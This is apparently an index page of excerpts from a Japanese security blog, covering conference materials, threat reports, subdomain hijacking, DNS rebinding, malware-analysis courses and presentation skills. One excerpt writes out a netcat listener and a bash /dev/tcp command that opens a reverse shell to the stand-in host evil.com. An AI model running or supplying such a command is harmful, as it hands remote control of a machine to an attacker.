Ross Andersonさんの Security Engineering (邦訳: 情報セキュリティ技術大全)の第2版が今月出たが、いくつかの章がサンプルとして公開されている。もちろん第1版は引き続き全部が公開されている。第2版の日本語版も出るのかなぁ? Security Engineering - A …

先週開催された LEET '08 (1st USENIX Workshop on Large-Scale Exploits and Emergent Threats)の Online Proceedingsが公開されていました。時間的な余裕がなくて、まだ目を通していません。なかなかおもしろそうな内容なのですが。 LEET '08 Program via …

http://www.microsoft.com/security/portal/sir.aspxVol.4(2007年7月〜12月)が公開されています。Key Findings Summaryは日本語版もありますね。興味深いところでは、全般的な攻撃数は増加(特にマルウェアの数は激増)しているものの、脆弱性自体の数は減少し…

カンファレンスのマテリアルが公開されていますね。 HITBSecConf2008 - Dubai これ行きたかったなぁ。年度明けすぐという微妙な時期だけど来年は行きたい。あるいはマレーシアのほうがいいかも。

上原先生のところから。 監査「する」リスク この件についてコメントはしませんが、これですぐ連想されるのは、じゃあセキュリティ監査も同じようなことが発生しうるの？ってこと。ペネストレーションした時に穴を見抜けなかったじゃないかって、事件発生後…

先日のエントリでISPによるサブドメインのハイジャック問題について書いたが、ToorCon Seattleで、Dan Kaminskyさんがこの問題を取り上げて発表したらしい。発表資料が公開されている。 ISP typo pimping exposes users to fraudulent web pages • The Regis…

Reverse Shell with Bash そうか、bashにはこんな機能もあったのね。使ったことないし。 ローカル(自分)側で netcatリスナーを起動。 $ nc -l -p 8080 -vvvリモート(相手)側で net redirectionを利用する。 $ exec 5<>/dev/tcp/evil.com/8080 $ cat <&5 | wh…

TechCrunch Japanese アーカイブ » Network Solutionsが未使用サブドメインをハイジャック via kwout これまたありえない話だが、数日前に実際に起きていたようだ。TechCrunchの記事によると、Network Solutionsは顧客が使用していないサブドメインへのアク…

以前にもちょっと紹介したが、今年の初めから F-Secureの研究者らがヘルシンキ工科大学で教えているマルウェア解析の特別コースというのがある。もうすぐ(来月?)終わるらしいのだが、コースのマテリアルや課題なんかが全て公開されているのがうれしい。リバ…

TechCrunch Japanese アーカイブ » Tumblrに重大な脆弱性 via kwout 今日はtumblrでブロギングするには良い日ではない。Hacker Newsのある人物が気付いたところによると、Tumblrのユーザーがログインして、簡単な管理画面URLを入れるだけでサイトの管理画面…

Presentation Masterclass - Part 1: Introduction 5 Key Questions When Planning Your Presentation (Presentation Masterclass - Part 2) lifehack.orgにプレゼンテーションに関するおもしろいエントリがでてる。どうやらシリーズ化するらしい。今後も要…

「解読不能は数学的に証明済み」、RSAを超える新暗号方式とは − ＠IT 記事の中身についてはいろいろな方が書かれているので突っ込まないが、この記事を見てちょっと違うことを思った。セキュリティ関係の仕事をする上でいくつか必須というべき資質があるよう…

http://www.computerworld.jp/topics/vs/103750.html http://www.symantec.com/business/theme.jsp?themeid=threatreport&inid=us_ghp_staticpromo_threatreport Executive Summary Report 最新のSymantecのInternet Security Threat Report(ISTR)から。さま…

RegRipperと日本語文字列 id:hideakiiさんのところで知ったのだが、RegRipperで日本語の文字化けが起こるらしい。 プラグインのソースを眺めてみると、確かにマルチバイトの考慮は全然していない模様。例えば、recentdocs2.plでファイル名を抽出する部分はこ…

APWG(Anti Phishing Working Group)主催のカンファレンスが来月(5/26.27)に東京で開催されるようです。全然知らなかった。5/9までの早期割引で43,300円とのこと。かなりおもしろそうだし、行こうかなぁ。APWG's CeCOS II Tokyo: Cyber eCrime Operation Summ…

RSA Conference: Web Page Can Take Over Your Router | PCWorld Demo shows how web attack threatens fabric of the universe • The Register RSA Conferenceのセッションで Dan Kaminksyさんが DNS Rebindingによるホームルーター攻撃のデモをやったらし…

前回の続き。 BBPは効果的なスライド作成法にフォーカスした方法論で、プレゼンテーションについてはあまり触れられていない。BBPでは以下のステップでスライドを作成していく。 ストーリー・テンプレートを作成する テンプレートの内容にしたがって、スライ…

人間はめったにおこらないことの確率を正確に見積もれないらしい。。。: まるちゃんの情報セキュリティ気まぐれ日記 少し前の丸山さんのブログから。雑誌「Newton」の2008年4月号の記事の内容を紹介されている。 人はなぜ確率に弱いのか? 直感と計算の「ズレ…

今年の1/22に「システムに重大な不具合が見つかった」ために、オープン早々に閉鎖された(ISC)2のメンバーズコミュニティ。その後、まったく音沙汰がなかったのだが、今日になって事務局からCISSPホルダーあてにメールが届いた。 (ISC)2メンバーズコミュニテ…

BBP本はしばらく前に買ったまま放置してあったのだが、Presentation Zenのセミナーに行ったのを機に読むことにした。本の内容をいくつかにわけてメモしておくことにする。 Chapter2ではBBPの3つの重要なポイントについて説明されている。 Trick 1: Slide Sor…

Truman - NSMWiki (via) マルウェアの自動解析システムとして知られている Truman。これまでにもいろいろなところで紹介はされているのだが、イマイチ情報が少なかったこともあって、使ってみたことはなかった。今回、上記の nsmwikiに インストール方法と簡…

Life Hacks PRESS Vol2 予約開始！ | Lifehacking.jp 「時間管理」について知りたいですか？ それならば良い本ができあがりました。このたび、シゴタノ！の大橋さんの監修のもと Life Hacks PRESS Vol.2 「限られた時間を最大限に活用する『カイゼン』術」が…

Presentation Zen: April 1: Presentation at the Apple Store Ginza ベストセラーになっている(らしい) "Presentation Zen"の著者 Garr Reynoldsさんのプレゼンテーションが銀座のアップルストアで行われたので参加してみた。テーマはこの本が出版されるま…